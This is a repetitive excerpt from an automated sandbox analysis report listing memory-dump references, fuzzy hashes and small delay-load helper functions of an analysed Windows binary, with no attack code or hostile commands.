Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
Instruction ID: 31a42c9acd6b6e866a4d7ade8b26ab3e7b2a3258e096f71f6932c61b90c50aa7
Opcode Fuzzy Hash: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
Instruction Fuzzy Hash: 98B012B126E142EC3198A14A7D16D3A021CD4C8B10330411AB51DD02C0D4887D480431

Function 007ED8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
Instruction ID: a567161a23e47b4916cd38c76f3ca28516986ce301c9475f379d5127e6cc51be
Opcode Fuzzy Hash: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
Instruction Fuzzy Hash: 89B012B126E042EC3158A14A6D16D3A021CD4C9B10330801AB91DD02C0D4487D080431

Function 007ED8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
Instruction ID: 60d181b92bf32e5bf85eea82f4cb93dbae2e214d1e5cf7bd1022425a726f26b6
Opcode Fuzzy Hash: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
Instruction Fuzzy Hash: 38B012A126E042AC315CA14F6E16D3A020CD4C8B10330801AB51DD03C0D4487D0E1431

Function 007ED8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
Instruction ID: 7f01aca3784e1ebd42c2de345ee28e2d3bb58f0db30c46d8bdb97ddbf0f8aef8
Opcode Fuzzy Hash: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
Instruction Fuzzy Hash: 57B012A126E182AC3198A14E7D16D3A020CD4C8B10330811AB51DD03C0D4887C8D0431

Function 007ED8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
Instruction ID: ea7dcfbf9c8e3dbb2442939bf8c8bfe3f9f2207b065b92c55d983b08fcc41104
Opcode Fuzzy Hash: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
Instruction Fuzzy Hash: A0B012A126E042AC3158A14E6D16D3A020CD4C9B10330C01AB91DD03C0D4487C0D0431

Function 007ED8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
Instruction ID: e0af370dafba37564f9d32888119d743a02590ad312255f6d9e390e3136ee9d6
Opcode Fuzzy Hash: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
Instruction Fuzzy Hash: E2B012A526E142AC3158A14A6D56D3F020CF4C8B10330401AB91DD02C0D54C7C080531

Function 007ED891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
Instruction ID: f31994ed3003994241a55e001a7b07c9de78ec4dc3e9a87d65125a036a1c7d75
Opcode Fuzzy Hash: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
Instruction Fuzzy Hash: FCB012A526E342BC315861467D66C3F020CD4C4B10330452AB91DE01C0D48C7C4C4431

Function 007ED942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
Instruction ID: 31095b7463895bd26efa6e167c6eed8100f5a96d7ced8c569644e3e7a1b3aa86
Opcode Fuzzy Hash: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
Instruction Fuzzy Hash: 05B012B126E142AC315CA14A6E16D3A028CD4C8B10730401AB51DD02C0E5487D091431

Function 007ED92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
Instruction ID: b1c46516e2d2372e65086bb92e77e5adaab5eb5762b361ca43405cd6dfccceeb
Opcode Fuzzy Hash: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
Instruction Fuzzy Hash: 4AB012A126E142AC3158A15A6D16D3A024CD4C9B10330801ABA1DD02C0E5487C080431

Function 007ED924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
Instruction ID: e249948f4088c8ec1057ce6addedcb798d08a3510543c7d89b54d997c9293de6
Opcode Fuzzy Hash: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
Instruction Fuzzy Hash: 34B012A127F042AC3158A14A6D16D3A024EE8C8B10730401AB65DD02C0D448BC080431

Function 007ED910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
Instruction ID: 342e5dd5e7b7e9492f43cdca71472f307ededdbe2869fef7d9aa1cc8566a5dcb
Opcode Fuzzy Hash: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
Instruction Fuzzy Hash: C9B012B126F142AC3198A24A7D16D3A020ED4C8B10730411AB61DD02C0D488BC480431

Function 007ED906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
Instruction ID: 8b1dc7213e95aea38f5ac37943e33b5fe9372afa9d8f98e20e8a6a0a343e27bc
Opcode Fuzzy Hash: 46b1da2371aba0f4408797ab281e209c563af11f0f327878d4adba442d8afd87
Instruction Fuzzy Hash: 12B012A136F042AC3158A14A6D16D3A020ED4C9B10730801ABA1DD02C0D448BC080431

Function 007EDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
Instruction ID: bdf586f66e9991cd4b2343a32e9a1668b9d199dbe07fbffd6e74f1a216f1d1a5
Opcode Fuzzy Hash: bb085084b6d58ed3f3bc8d68642782318ebec91eb3c64c739a8df62c034f1f04
Instruction Fuzzy Hash: B6B012A126E041AC315CB14B6D16E3E024CE0CCB10330C52BF529C0284D44C4D0D4471

Function 007EDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
Instruction ID: 6d38bcbb9882cd10dba247c2aafd01df9e790f85f769606b24b3141af6fa79ac
Opcode Fuzzy Hash: ae32b700ef0c405b743935d2189831269698ec9dd46fc911ed20697389c1bacc
Instruction Fuzzy Hash: E1B012B126E041EC315CB1476C16D3A024CD0C8B10330C12BF829C0284D44C4E0C4871

Function 007EDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDAB2

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
Instruction ID: c890c64032f13f502f52f2186748e7ca8082c705d45120966238c568bf4a73d4
Opcode Fuzzy Hash: 1562eb87298add10838f2d6cec7d9a12aade925ea8e35ee9fa6540eb5167fa59
Instruction Fuzzy Hash: 91B012A12AE141AC715CF1476D16E3A024CF0C8B10330812BF429C0284D54C4D0C4571

Function 007EDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
Instruction ID: 260a3865ba837b19c1960c431994453461c328634f065841d05bc827d8027a75
Opcode Fuzzy Hash: 21e99585497217588c4d414fca0284bc9481d366de2091460f2e17859425c73b
Instruction Fuzzy Hash: 18B012E637E082AC315C9146AD1BE37025CE0C8B20330801AB219D02C0EA484C0D4031

Function 007EDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
Instruction ID: e74a027455f35a0e01a80eb4d9dcac7cef1f7b6ee2af5b94ce6659fb44529248
Opcode Fuzzy Hash: 239239b8c92ddb0628d9516b6c2bfae9b2e978422e928634fe6818feac2962d1
Instruction Fuzzy Hash: F8B012E637E042EC315C9146AC1BE3702ACE0C8B20330801AB519D12C0EA484C0C4031

Function 007EDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007EDBD5

